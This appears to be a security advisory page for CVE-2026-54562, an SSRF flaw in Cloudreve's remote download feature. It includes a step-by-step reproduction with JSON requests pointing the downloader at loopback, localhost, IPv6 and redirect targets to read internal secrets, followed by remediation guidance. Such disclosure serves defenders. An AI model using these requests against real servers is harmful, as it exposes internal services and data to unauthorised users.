CVE-2026-54562: Cloudreve: Non-admin remote download users can SSRF loopback/internal services and read imported responses

Published Jul 15, 2026
·
Updated

Summary

Cloudreve's remote download workflow accepts user-supplied URLs and passes them to the configured downloader without blocking loopback, localhost, IPv6 localhost, or redirect-to-loopback targets.

When the remote download permission is granted to a non-admin user group, a normal authenticated user can make the server-side downloader fetch internal-only URLs and then read the fetched response after it is imported into the user's own Cloudreve files.

This does not affect default normal users unless the remote download permission is enabled for their group. However, the permission is a feature-level user-group capability and does not make the user an administrator.

Attacker requirements

The attacker must be:

- authenticated - non-admin - in a user group where GroupPermissionRemoteDownload is enabled

Default normal users are blocked from the affected workflow. In the default install, only the admin group has the remote download permission, while the default User group does not.

Affected endpoint

http POST /api/v4/workflow/download

Follow-up attacker readback was performed through normal workflow and file APIs:

http GET /api/v4/workflow?category=downloaded... GET /api/v4/file?uri=cloudreve://my... POST /api/v4/file/url

Root cause

The remote download workflow checks whether the user group has remote download permission, but it does not validate the submitted URL before passing it to the downloader.

Relevant code paths:

- service/explorer/workflows.go:81 - pkg/filemanager/workflows/remotedownload.go:202 - pkg/downloader/aria2/aria2.go:56

The application does not block loopback, localhost, IPv6 localhost, or redirect targets resolving to internal addresses.

Impact

A non-admin user with remote download permission can use Cloudreve as an SSRF primitive to access services reachable from the downloader environment.

In my test, the attacker could fetch internal loopback URLs and read the response body after Cloudreve imported the downloaded content into the attacker's own files.

Confirmed targets:

- http://127.0.0.1:7777/secret2 - http://localhost:7777/localsecret - http://[::1]:7780/v6secret - redirect to http://127.0.0.1:7777/redirsecret

This can expose internal HTTP services, loopback-only admin panels, local service metadata, or other network resources that are not directly reachable by the attacker.

Reproduction

1. Permission negative control

The attacker is a normal non-admin user in the default User group.

Before enabling remote download for the group:

http POST /api/v4/workflow/download Content-Type: application/json

{"src":["http://127.0.0.1:7777/secret"],"dst":"cloudreve://my"}

Response:

json {"code":40007,"msg":"Group not allowed to download files"}

2. Enable only remote download permission for the non-admin group

The default install grants remote download to the admin group only. The default User group does not have it.

Confirmed in:

- inventory/migration.go:154 - inventory/migration.go:179

For this test, I only changed group 2 permissions from:

text hAg=

to:

text hAo=

The attacker remained in the User group and was not made admin. GET /api/v4/user/me still returned the group name as User.

3. Start an internal listener

Example listener on the Cloudreve host:

text 127.0.0.1:7777

The listener returned a marker response:

text SSRFSECRET220260527

4. Queue a remote download to loopback

http POST /api/v4/workflow/download Content-Type: application/json

{"src":["http://127.0.0.1:7777/secret2"],"dst":"cloudreve://my"}

Response:

json {"code":0,"data":[{"id":"OzH4","status":"queued","type":"remotedownload"}]}

The internal listener received the request:

text 127.0.0.1 - - [27/May/2026 13:00:46] "GET /secret2 HTTP/1.1" 200 -

Aria2 completed the download:

text Download complete: /home/b4r/cysec/cvehunting/cloudreve/data/temp/.../secret2

5. Read the imported internal response as the attacker

The task completed successfully:

json {"id":"OzH4","status":"completed","summary":{"props":{"srcstr":"http://127.0.0.1:7777/secret2","failed":0}}}

The attacker could list the imported file:

json {"name":"secret2","path":"cloudreve://my/secret2"}

The attacker could then download and read the response body:

text SSRFSECRET220260527

Additional validated variants

localhost

Input:

text http://localhost:7777/localsecret

Attacker readback:

text LOCALHOSTSECRET20260527

Redirect to loopback

Input:

text http://127.0.0.1:7779/anything

Redirect:

text 302 Location: http://127.0.0.1:7777/redirsecret

Attacker readback:

text REDIRSECRET20260527

IPv6 localhost

Input:

text http://[::1]:7780/v6secret

Attacker readback:

text IPV6SECRET20260527

Expected behavior

Cloudreve should reject remote download URLs that resolve to loopback, localhost, private network ranges, link-local ranges, metadata service ranges, or other internal-only targets unless explicitly allowed by an administrator.

Redirect targets should be checked with the same policy.

Actual behavior

Cloudreve accepts the URL, passes it to the downloader, imports the fetched internal response into the attacker's files, and allows the attacker to read it.

Other sources

Cloudreve is a self-hosted file management and sharing system. Prior to 4.16.1, Cloudreve's remote download workflow accepts user-supplied URLs at POST /api/v4/workflow/download and passes them to the configured downloader without blocking loopback, localhost, IPv6 localhost, or redirect-to-loopback targets, allowing a non-admin user with remote download permission to fetch internal-only URLs and read the response after it is imported into the user's own files. This issue is fixed in version 4.16.1.

NVD

Affected Software

3 affected componentsFixes available
Cloudreve<4.16.1
go/github.com/cloudreve/Cloudreve/v3<=3.0.0-20250225100611-da4e44b77af4
go/github.com/cloudreve/Cloudreve/v4<4.0.0-20260606025411-aaebf317a78f
4.0.0-20260606025411-aaebf317a78f

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade go/github.com/cloudreve/Cloudreve/v4 to a version that resolves this vulnerability.

    Fixed in 4.0.0-20260606025411-aaebf317a78f
  2. Upgrade

    Upgrade Cloudreve to a version that resolves this vulnerability.

    Fixed in 4.16.1
  3. Configuration

    Ensure remote download permission is not granted to non-admin user groups; only administrators should have GroupPermissionRemoteDownload enabled.

    Cloudreve remote download workflow GroupPermissionRemoteDownload = Enable only for the admin group
  4. Compensating control

    If remote download must be used, configure Cloudreve to reject remote download URLs that resolve to loopback (127.0.0.1), localhost, IPv6 localhost (::1), private/internal network ranges, link-local ranges, metadata service ranges, or other internal-only targets unless explicitly allowed by an administrator; apply the same policy to redirect targets.

Event History

Jul 15, 2026
CVE Published
via MITRE·02:37 PM
Data Sourced
via MITRE·02:37 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·03:16 PM
DescriptionSeverityWeakness
Jul 20, 2026
Advisory Published
via GitHub·09:16 PM
Data Sourced
via GitHub·09:16 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-54562?

CVE-2026-54562 has a medium severity score of 6.5.

2

How do I fix CVE-2026-54562?

To mitigate CVE-2026-54562, upgrade to Cloudreve version 4.16.1 or later.

3

What type of vulnerability is CVE-2026-54562?

CVE-2026-54562 is classified as a Server-Side Request Forgery (SSRF) vulnerability.

4

Who is affected by CVE-2026-54562?

Non-admin remote download users of Cloudreve prior to version 4.16.1 are at risk from CVE-2026-54562.

5

What can attackers do with CVE-2026-54562?

Attackers can exploit CVE-2026-54562 to perform SSRF against internal services and read the responses.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203